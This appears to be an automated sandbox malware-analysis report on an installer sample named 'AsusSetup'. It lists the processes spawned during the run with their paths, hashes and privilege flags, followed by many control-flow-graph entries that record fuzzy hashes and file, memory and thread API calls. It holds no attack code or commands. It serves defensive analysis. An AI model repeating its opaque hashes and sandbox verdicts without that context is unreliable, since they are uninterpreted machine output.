MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:false

Target ID:6
Start time:11:49:57
Start date:28/10/2024
Path:C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:154'952 bytes
MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:false

Target ID:7
Start time:11:49:57
Start date:28/10/2024
Path:C:\Windows\System32\AppVClient.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\AppVClient.exe
Imagebase:0x140000000
File size:1'348'608 bytes
MD5 hash:2148D94316FBFFE84543113C6A3C1FA4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:10
Start time:11:49:59
Start date:28/10/2024
Path:C:\Windows\System32\FXSSVC.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\fxssvc.exe
Imagebase:0x140000000
File size:1'242'624 bytes
MD5 hash:5E3D1E384655DE6087F47BBB3A38FB17
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:11
Start time:11:50:00
Start date:28/10/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Imagebase:0x140000000
File size:2'354'176 bytes
MD5 hash:02A39F6A65834451980F9B1EE3EA62AA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                                                                                                                                                                  Start time:11:50:01
                                                                                                                                                                                                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:1'512'448 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5 hash:8692348A40AAA0C027003BE9DA09E432
                                                                                                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Has exited:true


                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Coverage:12%
                                                                                                                                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:98%
                                                                                                                                                                                                                                                                                                                                                                                                                    Signature Coverage:1.5%
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Nodes:202
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:18
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 908c24f0ecee5e6f2dddf1d8173b17ebe70cd201337ab44e3e024085c5e0ca95
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4140edc9ed4407511f6d591b39bddada7e71295da6bff5ac8270af6427762992
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 908c24f0ecee5e6f2dddf1d8173b17ebe70cd201337ab44e3e024085c5e0ca95
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B941F293A0D691CFE72A422C58743B17EB39B13262F4D02979587CB1F2E99B48548367

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c3c2c3ebb38d012564697c7b13eda330ccdc57883374f0f115d01db4afc1a989
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d677dd05c89b7f786ca0ba246f6b9da6be44daed0d7c7e35bfef289e7c136b93
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3c2c3ebb38d012564697c7b13eda330ccdc57883374f0f115d01db4afc1a989
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CB1173190CA45CBEB2ACF1D8885679BBE3FF95354F1C8259D88B87166DA379802C352

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

[Control-flow graph not reproduced. Legend: Executed / Not Executed. API calls labelled in the graph: CreateThread, CloseHandle]
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ce3f9119a031061baa606f21087281148c21c7d9cee102b95e9d1de0711b0121
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 38a3e544e1c6e992fa2c63a2fb77311adc22f47edc70719e980b594e9b57dc31
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce3f9119a031061baa606f21087281148c21c7d9cee102b95e9d1de0711b0121
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD41D922A0CE09CFEB69973C98687397AF3EB55311F4C036AD507CB1B1DE6784068762

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

[Control-flow graph not reproduced. Legend: Executed / Not Executed. API calls labelled in the graph: CreateThread, CloseHandle]
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: eea8b3599f103d4e574ebf5c6b1afbd860f4798a5f425f9dafef797addc356b6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FF0F622E1CD05C5EB2E873C886933A75F3A78A121F5C071FC567CA1F0DA2741028265

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

[Control-flow graph not reproduced. Legend: Executed / Not Executed. API calls labelled in the graph: SetFilePointerEx]
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2e225c41a0938c32b06857d4df1b06a163d03e96ae6c5dbee083fbf99e02f96e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 19aeead9cf9cc57a85212553ac71f2c3860f09da5432d8476a98ad12d67bacb5
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e225c41a0938c32b06857d4df1b06a163d03e96ae6c5dbee083fbf99e02f96e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0441E522E0C742CBEB399AEC885167A77D3BBC461CF8D462ED167C2191DAE788018743

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

[Control-flow graph not reproduced. Legend: Executed / Not Executed. API calls labelled in the graph: SetFilePointerEx, ReadFile, VirtualAlloc]
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: dcd7d6061518b5e23cc30ba14f8cd645cc1f06b40db9b23a040c2072c8923b03
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 95eecba4fa708119a0501cceb86e4bd640af147089680334923987f5823312c8
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcd7d6061518b5e23cc30ba14f8cd645cc1f06b40db9b23a040c2072c8923b03
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53213433A0C648CAFB655B3C98483357B93F78973AF0C432BD456C21A3DE6B91028342

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
[Control-flow graph: rendered edge list omitted. API calls labelled in the graph: WriteFile, SetFilePointerEx]
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: File$PointerWrite
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 539440098-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 96d675477f5884ca1f21a6f8044b01c34adb70bd1f4ac458339bad4b2e7f88fe
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9e25c5fc41b92ab76dfbcb6a91d3f38c3cc8d532c7c3cc7d5a1c069573b94e81
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96d675477f5884ca1f21a6f8044b01c34adb70bd1f4ac458339bad4b2e7f88fe
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3F02221A1CB05DAEB2B836C08A42393A93EBC85E4B0D416AC687C3292CD2748074203

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
[Control-flow graph: rendered edge list omitted. API calls labelled in the graph: SetFilePointerEx]
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: cbf6bd2aa41ab4d748ede1907bad094a449333e7c2c1b9fb22cf0f88fd851f0e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e940b1cea812b3747d26a32b0143fad6a8b382cacbbb2d09e71037452a67ce0e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbf6bd2aa41ab4d748ede1907bad094a449333e7c2c1b9fb22cf0f88fd851f0e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11514622D0C685CFEB264BFC485817A3BA7BB4322DF0D526AD957C31E7D9E744068222

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
[Control-flow graph: rendered edge list omitted. API calls labelled in the graph: SetFilePointerEx]
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a56446c4e470bf6b7c3ee6f36cbd9dcf94501d6e54935f9ea76e47303719afa8
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: bb231e60e25399806cf1965930d129c0aa94671bebe2fc87de778d7e6e9d4649
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a56446c4e470bf6b7c3ee6f36cbd9dcf94501d6e54935f9ea76e47303719afa8
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED21E192D0E385CEEB270A3C581C3323FA79BD7018B4C04AAD583CB4A3EA478805825E

Control-flow Graph (legend: Executed, Not Executed)
APIs
Memory Dump Source
• Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0

Control-flow Graph (legend: Executed, Not Executed)
APIs
Memory Dump Source
• Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0

Control-flow Graph (legend: Executed, Not Executed)
APIs
Memory Dump Source
• Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0

Control-flow Graph (legend: Executed, Not Executed)
APIs
Memory Dump Source
• Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b63effb34f7ad229d2f8481b85073b53b936557c6f19cf734c30284eb0ff6338
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 73fdcaa9c56b1b89847aca4816db34c961960007c423b9a582513d9bd49bd3ed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b63effb34f7ad229d2f8481b85073b53b936557c6f19cf734c30284eb0ff6338
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85E08C7100C700CBE716DB8CD488B3A7BD3FB88388F0C0418E68AC2260CB7A85898B42

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 835b528c6dcffabb250974905218d0cb35aa061c9c7f48dde8b7e13ad1b7d173
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: cd56ab8ff6e276b2e556f1b528d39d12af280ee1fc48a60ef6adede6bb72cf00
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 835b528c6dcffabb250974905218d0cb35aa061c9c7f48dde8b7e13ad1b7d173
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEE08665D0D788DAE77B577C484C3797E93AB422D8F0C054BE5A1C60A6C667CC028712

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 412e19964fa084b0320597dc17b3db4847efaffa2005f417fa316b51f5812584
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1d9630e6c38abda1b84482df013835b7fb9ace59761ba44e9e1b53710ac8d18a
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 412e19964fa084b0320597dc17b3db4847efaffa2005f417fa316b51f5812584
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE0925124E3818ED3139FB858087B53EB2BF021ACF4D038EB4A5C60E3DB5B8809C701

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8b5d510f54f190b41ef9304eccb758e96c77d313a1906c0b31328302ad949a01
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 01659f5a9d69977d25391274df4c699428212f00977f0517ab851a1225de27a0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b5d510f54f190b41ef9304eccb758e96c77d313a1906c0b31328302ad949a01
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFD02236B2850CCA2B3D8F7D0AA02392543E3D80E031E872DC1ABE2084DD3354020003
APIs
Memory Dump Source
• Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
Similarity
• API ID: CreateThread$CloseHandle
• String ID:
• API String ID: 738052048-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: caa725a902d60e659633ec615f2acf4b142068780a329095be708c1c73959928
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 262f63ed467da772506c05de75a4032c11b624772aef1f84222c80f56183a4cb
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: caa725a902d60e659633ec615f2acf4b142068780a329095be708c1c73959928
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF0A426D1DA91CFE627D71C945197A7FA3AF82290B4D008AD44BCB563CA179C02D793
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 51649a53adf5be35349eb32c6ae77fada500a909c13eaf169d54f29d69e3d903
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FF09036D1C941CB9636C70CD881E3A3F63BB412C1B5C4049C54BCB523D627D802C793
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 3954737543-0
